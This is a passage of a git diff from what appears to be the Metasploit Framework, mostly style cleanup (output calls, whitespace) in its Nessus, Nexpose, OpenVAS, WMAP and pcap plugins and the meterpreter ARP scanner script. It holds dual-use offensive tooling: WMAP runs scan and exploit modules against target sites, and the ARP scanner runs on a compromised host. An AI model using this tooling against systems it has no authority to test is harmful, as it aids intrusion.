"-h" print_status("Usage: ") print_status(" nessus_policy_list") @@ -1555,14 +1552,13 @@ module Msf print_status("Lists all policies on the server") return end - + if ! nessus_verify_token return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'ID', 'Name', 'Comments' @@ -1572,12 +1568,12 @@ module Msf tbl << [ policy['id'], policy['name'], policy['comments'] ] } print_good("Nessus Policy List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_policy_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_policy_del ") @@ -1587,16 +1583,16 @@ module Msf print_status("use nessus_policy_list to list all policies") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 pid = args[0] @@ -1606,9 +1602,8 @@ module Msf print_status(" nessus_policy_list to find the id.") return end - + print_error("Are you sure you want to delete #{pid} ?") - $stdout.flush answer = gets answer.chomp! if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes" @@ -1623,9 +1618,9 @@ module Msf print_error("wow that was close, damn we asked") end end - + def cmd_nessus_plugin_details(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_details ") @@ -1635,11 +1630,11 @@ module Msf print_status("use nessus_plugin_list to list all plugins") return end - + if ! nessus_verify_token return end - + case args.length when 1 pname = args[0] @@ -1649,14 +1644,13 @@ module Msf print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ '', '' ]) - + entry = @n.plugin_detail(pname) print_good("Plugin Details for #{entry['name']}") tbl << [ "Plugin ID", entry['id'] ] @@ -1673,12 +1667,12 @@ module Msf tbl << [ "Solution", entry['solution'] ] tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ] tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ] - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_report_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_del ") @@ -1688,16 +1682,16 @@ module Msf print_status("use nessus_report_list to list all reports") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 rid = args[0] @@ -1707,9 +1701,8 @@ module Msf print_status(" nessus_report_list to find the id.") return end - + print_error("Are you sure you want to delete #{rid} ?") - $stdout.flush answer = gets answer.chomp! if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes") @@ -1723,12 +1716,12 @@ module Msf else print_error("wow that was close, damn we asked") end - - + + end - + def cmd_nessus_server_prefs(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_prefs") @@ -1737,19 +1730,18 @@ module Msf print_status("Returns a long list of server prefs.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Value' ]) @@ -1758,13 +1750,13 @@ module Msf tbl << [ pref['name'], pref['value'] ] } print_good("Nessus Server Pref List") - puts "\n" - puts tbl.to_s + "\n" - + print_good "\n" + print_good tbl.to_s + "\n" + end - + def cmd_nessus_plugin_prefs(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_prefs") @@ -1773,19 +1765,18 @@ module Msf print_status("Returns a long list of plugin prefs.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Value', 'Type' @@ -1795,11 +1786,11 @@ module Msf tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ] } print_good("Nessus Plugins Pref List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end end - + def initialize(framework, opts) super diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index ced99dc51a..d53d01740d 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin end end - # - # Nexpose vuln lookup - # - def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil) - doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef| - - title = vulndef.attributes['title'] - pciSeverity = vulndef.attributes['pciSeverity'] - cvss_score = vulndef.attributes['cvssScore'] - cvss_vector = vulndef.attributes['cvssVector'] - - vulndef.elements['references'].elements.each('reference') do |ref| - if ref.attributes['source'] == 'BID' - refs[ 'BID-' + ref.text ] = true - elsif ref.attributes['source'] == 'CVE' - # ref.text is CVE-$ID - refs[ ref.text ] = true - elsif ref.attributes['source'] == 'MS' - refs[ 'MSB-MS-' + ref.text ] = true - end - end - - refs[ 'NEXPOSE-' + vid.downcase ] = true - - vuln = framework.db.find_or_create_vuln( + # + # Nexpose vuln lookup + # + def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil) + doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef| + + title = vulndef.attributes['title'] + pciSeverity = vulndef.attributes['pciSeverity'] + cvss_score = vulndef.attributes['cvssScore'] + cvss_vector = vulndef.attributes['cvssVector'] + + vulndef.elements['references'].elements.each('reference') do |ref| + if ref.attributes['source'] == 'BID' + refs[ 'BID-' + ref.text ] = true + elsif ref.attributes['source'] == 'CVE' + # ref.text is CVE-$ID + refs[ ref.text ] = true + elsif ref.attributes['source'] == 'MS' + refs[ 'MSB-MS-' + ref.text ] = true + end + end + + refs[ 'NEXPOSE-' + vid.downcase ] = true + + vuln = framework.db.find_or_create_vuln( :host => host, :service => serv, :name => 'NEXPOSE-' + vid.downcase, :data => title) - - rids = [] - refs.keys.each do |r| - rids << framework.db.find_or_create_ref(:name => r) - end - - vuln.refs << (rids - vuln.refs) - end - end + + rids = [] + refs.keys.each do |r| + rids << framework.db.find_or_create_ref(:name => r) + end + + vuln.refs << (rids - vuln.refs) + end + end end diff --git a/plugins/openvas.rb b/plugins/openvas.rb index f856006962..46722a58df 100644 --- a/plugins/openvas.rb +++ b/plugins/openvas.rb @@ -3,7 +3,10 @@ # This plugin provides integration with OpenVAS. Written by kost and # averagesecurityguy. # -# Distributed under MIT license: +# $Id$ +# $Revision$ +# +# Distributed under MIT license: # http://www.opensource.org/licenses/mit-license.php # @@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin 'openvas_task_pause' => "Pause task by ID", 'openvas_task_resume' => "Resume task by ID", 'openvas_task_resume_or_start' => "Resume task or start task by ID", - + 'openvas_target_create' => "Create target (name, hosts, comment)", 'openvas_target_delete' => "Delete target by ID", 'openvas_target_list' => "Display list of targets", @@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin 'openvas_format_list' => "Display list of available report formats", - 'openvas_report_list' => "Display a list of available report formats", + 'openvas_report_list' => "Display a list of available report formats", 'openvas_report_delete' => "Delete a report specified by ID", 'openvas_report_download' => "Save a report to disk", 'openvas_report_import' => "Import report specified by ID into framework", @@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin # Make sure the correct number of arguments are present. if args?(args, 4, 5) - + user, pass, host, port, sslv = args # SSL warning. User is required to confirm. @@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin else print_status("Usage:") - print_status("openvas_connect username password host port ") + print_status("openvas_connect username password host port ") end end - + # Disconnect from an OpenVAS manager def cmd_openvas_disconnect() return unless openvas? @@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin #-------------------------- def cmd_openvas_target_create(*args) return unless openvas? - + if args?(args, 3) begin resp = @ov.target_create(args[0], args[1], args[2]) @@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin 'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"]) id = 0 @ov.target_get_all().each do |target| - tbl << [ id, target["name"], target["hosts"], target["max_hosts"], - target["in_use"], target["comment"] ] + tbl << [ id, target["name"], target["hosts"], target["max_hosts"], + target["in_use"], target["comment"] ] id += 1 end print_good("OpenVAS list of targets") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of tasks") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin begin tbl = Rex::Ui::Text::Table.new( 'Columns' => [ "ID", "Name" ]) - + id = 0 @ov.configs.each do |config| tbl << [ id, config["name"] ] id += 1 end print_good("OpenVAS list of configs") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of report formats") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of reports") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin print_status("Usage: openvas_report_download ") end end - + def cmd_openvas_report_import(*args) return unless openvas? @@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin else print_status("Usage: openvas_report_import ") print_status("Only the NBE format is supported for importing.") - end + end end end # End OpenVAS class diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb index 496e75abad..c7bf8e368e 100644 --- a/plugins/pcap_log.rb +++ b/plugins/pcap_log.rb @@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin "pcap_iface" => "Set/Get an interface to capture from", "pcap_start" => "Start a capture", "pcap_stop" => "Stop a running capture", - + "pcap_show_config" => "Show the current PcapLog configuration" } end @@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin def cmd_pcap_iface(*args) @iface = args[0] || @iface - print_line "#{self.name} Interface: #{@iface}" + print_line "#{self.name} Interface: #{@iface}" end def cmd_pcap_start(*args) @@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin print_line "Capture Stats: #{@pcap.stats.inspect}" @pcap = nil @capture_file.close if @capture_file.respond_to? :close - @capture_thread.kill + @capture_thread.kill @capture_thread = nil else print_error "No capture running." @@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin return [false, msg] end - # Check directory suitability. + # Check directory suitability. unless File.directory? @dir msg = "Invalid pcap directory specified: '#{@dir}'" return [false, msg] @@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin end end - + def initialize(framework, opts) super add_console_dispatcher(PcapLogDispatcher) diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 12b4a1f796..010e2140f7 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -12,9 +12,9 @@ module Msf class Plugin::Wmap < Msf::Plugin class WmapCommandDispatcher - + attr_accessor :targets - + include Msf::Ui::Console::CommandDispatcher def name @@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin while (arg = args.shift) case arg - when '-c' - self.targets = {} + when '-c' + self.targets = {} when '-l' view_targets return - when '-t' + when '-t' process_urls(args.shift) when '-h' print_status("Usage: wmap_targets [options]") @@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ") print_line("\t-c Clean target sites list") print_line("\t-l List all target sites") - + print_line("") return else @@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin end end end - + def cmd_wmap_sites(*args) args.push("-h") if args.length == 0 @@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin when '-a' s = add_web_site(args.shift) if s - print_status("Site created.") + print_status("Site created.") else print_error("Unable to create site") - end + end when '-l' view_sites return @@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin u = args.shift l = args.shift s = args.shift - + if l == nil or l.empty? l = 200 s = true @@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin l = l.to_i s = false end - + view_site_tree(u,l,s) - return + return when '-h' print_status("Usage: wmap_sites [options]") print_line("\t-h Display this help text") print_line("\t-a [url] Add site (vhost,url)") print_line("\t-l List all available sites") print_line("\t-s [urls] (level) Display site structure (vhost,url)") - + print_line("") return else @@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin end end end - + def cmd_wmap_run(*args) # Run exploit check wmap_check = true @@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin wmap_runexpl = false # Exit wmap if session is created wmap_exitifsess = true - + # Formating sizeline = 60 @@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin # Exclude files can be modified by setting datastore['WMAP_EXCLUDE'] wmap_exclude_files = '.*\.(gif|jpg|png*)$' - + run_wmap_ssl = true run_wmap_server = true run_wmap_dir_file = true run_wmap_query = true run_wmap_unique_query = true run_wmap_generic = true - + # If module supports datastore['VERBOSE'] moduleverbose = false - + showprogress = false - + if not run_wmap_ssl print_status("Loading of wmap ssl modules disabled.") end if not run_wmap_server print_status("Loading of wmap server modules disabled.") - end - if not run_wmap_dir_file + end + if not run_wmap_dir_file print_status("Loading of wmap dir and file modules disabled.") end if not run_wmap_query print_status("Loading of wmap query modules disabled.") - end - if not run_wmap_unique_query + end + if not run_wmap_unique_query print_status("Loading of wmap unique query modules disabled.") - end - if not run_wmap_generic + end + if not run_wmap_generic print_status("Loading of wmap generic modules disabled.") - end - + end + stamp = Time.now.to_f mode = 0 @@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin print_status("Using module #{mname}.") end using_m = true - + when '-h' print_status("Usage: wmap_run [options]") print_line("\t-h Display this help text") @@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin print_error("Targets have not been selected.") return end - - if self.targets.keys.length == 0 + + if self.targets.keys.length == 0 print_error("Targets have not been selected.") return end - + self.targets.each_with_index do |t, idx| selected_host = t[1][:host] selected_port = t[1][:port] selected_ssl = t[1][:ssl] selected_vhost = t[1][:vhost] - + print_status ("Testing target:") print_status ("\tSite: #{selected_vhost} (#{selected_host})") print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}") - puts '='* sizeline + print_status '='* sizeline print_status("Testing started. #{(Time.now )}") - - + + if not selected_ssl run_wmap_ssl = false #print_status ("Target is not SSL. SSL modules disabled.") end - + # WMAP_DIR, WMAP_FILE matches = {} @@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin # WMAP_QUERY matches2 = {} - + # WMAP_SSL matches3 = {} @@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin if penabled #if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname)) - if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p) + if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p) # # First run the WMAP_SERVER plugins # @@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin when :WMAP_SSL if run_wmap_ssl matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true - end + end else # Black Hole end @@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin # Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server. # :WMAP_SSL # - - puts "\n=[ SSL testing ]=" - puts "=" * sizeline - + + print_status "\n=[ SSL testing ]=" + print_status "=" * sizeline + if not selected_ssl print_status ("Target is not SSL. SSL modules disabled.") end - + idx = 0 matches3.each_key do |xref| idx += 1 @@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin mod.datastore['VHOST'] = xref[3].to_s mod.datastore['VERBOSE'] = moduleverbose mod.datastore['ShowProgress'] = showprogress - + # # Run the plugins that only need to be # launched once. @@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_SSL - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin end end - + # # Handle modules that need to be run before all tests, once usually again the web server. # :WMAP_SERVER # - puts "\n=[ Web Server testing ]=" - puts "=" * sizeline - + print_status "\n=[ Web Server testing ]=" + print_status "=" * sizeline + idx = 0 matches1.each_key do |xref| idx += 1 @@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_SERVER - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin # Handle modules to be run at every path/file # WMAP_DIR, WMAP_FILE # - puts "\n=[ File/Dir testing ]=" - puts "=" * sizeline - + print_status "\n=[ File/Dir testing ]=" + print_status "=" * sizeline + idx = 0 matches.each_key do |xref| idx += 1 @@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - - puts "Module #{xref[4]}:" - + + print_status "Module #{xref[4]}:" + test_tree = load_tree(w) test_tree.each do |node| - - p = node.current_path + + p = node.current_path testpath = Pathname.new(p) strpath = testpath.cleanpath(false).to_s @@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin # Run modules for each request to play with URI with UNIQUE query parameters. # WMAP_UNIQUE_QUERY # - puts "\n=[ Unique Query testing ]=" - puts "=" * sizeline - + print_status "\n=[ Unique Query testing ]=" + print_status "=" * sizeline + idx = 0 matches5.each_key do |xref| idx += 1 @@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type utest_query = {} - + h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - + w.web_forms.each do |form| # # Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn' # - + datastr = "" - typestr = "" - + typestr = "" + temparr = [] - - #puts "---------" - #puts form.params - #puts "+++++++++" - + + #print_status "---------" + #print_status form.params + #print_status "+++++++++" + form.params.each do |p| pn, pv, pt = p temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s) end - - datastr = temparr.join("&") if (temparr and not temparr.empty?) - + + datastr = temparr.join("&") if (temparr and not temparr.empty?) + if (utest_query.has_key?(mod.signature(form.path,datastr)) == false) - + mod.datastore['METHOD'] = form.method.upcase mod.datastore['PATH'] = form.path mod.datastore['QUERY'] = form.query if form.method.upcase == 'GET' mod.datastore['QUERY'] = datastr - mod.datastore['DATA'] = "" - end + mod.datastore['DATA'] = "" + end mod.datastore['DATA'] = datastr if form.method.upcase == 'POST' mod.datastore['TYPES'] = typestr - + # # TODO: Add headers, etc. # if wtype == :WMAP_UNIQUE_QUERY - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin # Unique query tested, actually the value does not matter # #print_status("sig: #{mod.signature(form.path,varnarr.join(','))}") - + utest_query[mod.signature(form.path,datastr)]=1 else #print_status("Already tested") @@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin # and will make this shotgun implementation much simple. # WMAP_QUERY # - puts "\n=[ Query testing ]=" - puts "=" * sizeline - + print_status "\n=[ Query testing ]=" + print_status "=" * sizeline + idx = 0 matches2.each_key do |xref| idx += 1 @@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - + w.web_forms.each do |req| - + datastr = "" - typestr = "" - + typestr = "" + temparr = [] - + req.params.each do |p| pn, pv, pt = p temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s) end - - datastr = temparr.join("&") if (temparr and not temparr.empty?) - + + datastr = temparr.join("&") if (temparr and not temparr.empty?) + mod.datastore['METHOD'] = req.method.upcase mod.datastore['PATH'] = req.path if req.method.upcase == 'GET' mod.datastore['QUERY'] = datastr - mod.datastore['DATA'] = "" - end + mod.datastore['DATA'] = "" + end mod.datastore['DATA'] = datastr if req.method.upcase == 'POST' mod.datastore['TYPES'] = typestr - - + + # # TODO: Add method, headers, etc. # if wtype == :WMAP_QUERY - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin print_status(" >> Exception from #{xref[4]}: #{$!}") end end - + # # Handle modules that need to be after all tests, once. # Good place to have modules that analize the test results and/or # launch exploits. # :WMAP_GENERIC # - puts "\n=[ General testing ]=" - puts "=" * sizeline - + print_status "\n=[ General testing ]=" + print_status "=" * sizeline + idx = 0 matches10.each_key do |xref| idx += 1 @@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_GENERIC - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin print_status(" >> Exception during check launch from #{xref[4]}: #{$!}") end else - + begin session = mod.run_simple( 'LocalInput' => driver.input, @@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin if (mode & wmap_show != 0) print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.") print_status("Done.") - puts "+" * sizeline - puts "\n" + print_status "+" * sizeline + print_status "\n" end end # EOM - end - + end + def view_targets if self.targets == nil or self.targets.keys.length == 0 print_status "No targets have been defined" return end - + indent = ' ' - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Defined targets', @@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ] } - puts tbl.to_s + "\n" + print_status tbl.to_s + "\n" end - + def view_sites indent = ' ' - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Available sites', @@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin '# Forms', ]) - idx = 0 + idx = 0 self.framework.db.hosts.each do |bdhost| bdhost.services.each do |serv| serv.web_sites.each do |web| - c = web.web_pages.count + c = web.web_pages.count f = web.web_forms.count tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ] idx += 1 @@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin end end - puts tbl.to_s + "\n" + print_status tbl.to_s + "\n" end - - + + # Reusing code from hdmoore # # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ - + def add_web_site(url) - - - + + + vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ @@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin uri = URI.parse(url) rescue nil if not uri print_error("Could not understand URL: #{url}") - return + return end if uri.scheme !~ /^https?/ print_error("Only http and https URLs are accepted: #{url}") return end - + ssl = false if uri.scheme == 'https' ssl = true end - + site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl) return site end - + # Code by hdm. Modified two lines by et # def process_urls(urlstr) @@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin urls.each do |url| next if url.to_s.strip.empty? vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ @@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 self.targets = {} - + target_whitelist.each do |ent| vhost,target = ent - + host = self.framework.db.workspace.hosts.find_by_address(target.host) if not host print_error("No matching host for #{target.host}") @@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin print_error("No matching service for #{target.host}:#{target.port}") next end - - #puts "aaa" - #puts framework.db.workspace.name - + + #print_status "aaa" + #print_status framework.db.workspace.name + #sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address]) - + sites = serv.web_sites.find(:all) - + sites.each do |site| - + #site.web_forms.find_all_by_path(target.path).each do |form| ckey = [ site.vhost, host.address, serv.port, target.path].join("|") if not self.targets[ckey] @@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin end end end - + def view_site_tree(urlstr, md, ld) - + site_whitelist = [] urls = urlstr.to_s.split(/\s+/) urls.each do |url| next if url.to_s.strip.empty? vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ if url !~ /^http/ vhost,url = url.split(",", 2) - + if url.to_s.empty? url = vhost vhost = nil @@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin return if site_whitelist.length == 0 vsites = {} - + site_whitelist.each do |ent| vhost,target = ent - + host = self.framework.db.workspace.hosts.find_by_address(target.host) if not host print_error("No matching host for #{target.host}") @@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin print_error("No matching service for #{target.host}:#{target.port}") next end - - #puts "aaa" - #puts framework.db.workspace.name - + + #print_status "aaa" + #print_status framework.db.workspace.name + sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address]) - + #sites = serv.web_sites.find(:all) - + sites.each do |site| #site.vhost #site.web_forms.find_all_by_path(target.path).each do |form| @@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin end end end - + # # Load website structure into a tree # def load_tree(s) - + pathchr = '/' - + wtree = Tree.new(s.vhost) - # Load site pages + # Load site pages s.web_pages.find(:all, :order => 'path').each do |req| tarray = req.path.to_s.split(pathchr) tarray.delete("") @@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin tpath = tpath + Pathname.new(df.to_s) end end - + # Load site forms s.web_forms.each do |req| tarray = req.path.to_s.split(pathchr) @@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin tpath = tpath + Pathname.new(df.to_s) end end - + return wtree end # # Print Tree structure. Still ugly # - + def print_tree(tree, maxlevel, limitlevel) initab = " " * 4 indent = 6 if tree != nil and tree.depth <= maxlevel print initab + (" " * indent * tree.depth) if tree.depth > 0 - print "|"+("-" * (indent-1))+"/" + print "|"+("-" * (indent-1))+"/" end - if tree.depth >= 0 + if tree.depth >= 0 if tree.depth == 0 - print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n" - + print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n" + else c = tree.children.count if c > 0 print tree.name + " (" + c.to_s+")\n" else print tree.name + "\n" - end + end end end - + tree.children.each_pair do |name,child| print_tree(child,maxlevel,limitlevel) end end end - + #def print_tree(tree) # if tree.is_leaf? and tree.depth > 0 @@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin # print_tree(child) # end #end - + end class WebTarget < ::Hash @@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin "#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}" end end - + def initialize(framework, opts) super - + wmapversion = '1.0' wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011" diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb index 999a0afa0e..52518cb899 100644 --- a/plugins/xmlrpc.rb +++ b/plugins/xmlrpc.rb @@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin self.server.add_handler(::XMLRPC::iPIMethods("plugin"), ::Msf::RPC::Plugin.new(*args) ) - + # Set the default/catch-all handler self.server.set_default_handler do |name, *args| raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!") diff --git a/scripts/meterpreter/arp_scanner.rb b/scripts/meterpreter/arp_scanner.rb index fbcda589e0..cab09e016e 100644 --- a/scripts/meterpreter/arp_scanner.rb +++ b/scripts/meterpreter/arp_scanner.rb @@ -25,6 +25,7 @@ def enum_int end end + def arp_scan(cidr) print_status("ARP Scanning #{cidr}") ws = client.railgun.ws2_32 @@ -42,27 +43,20 @@ def arp_scan(cidr) end iplst.each do |ip_text| if i < 10 - a.push(::Thread.new { + a.push(::Thread.new { h = ws.inet_addr(ip_text) ip = h["return"] h = iphlp.SendARP(ip,0,6,6) if h["return"] == client.railgun.const("NO_ERROR") - mac = h["pMacAddr"] - print_status("IP: #{ip_text} MAC " + - mac[0].ord.to_s(16) + ":" + - mac[1].ord.to_s(16) + ":" + - mac[2].ord.to_s(16) + ":" + - mac[3].ord.to_s(16) + ":" + - mac[4].ord.to_s(16) + ":" + - mac[5].ord.to_s(16) - ) + mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':') + print_status("IP: #{ip_text} MAC #{mac_text}") found << "#{ip_text}\n" end }) - i += 1 + i += 1 else - 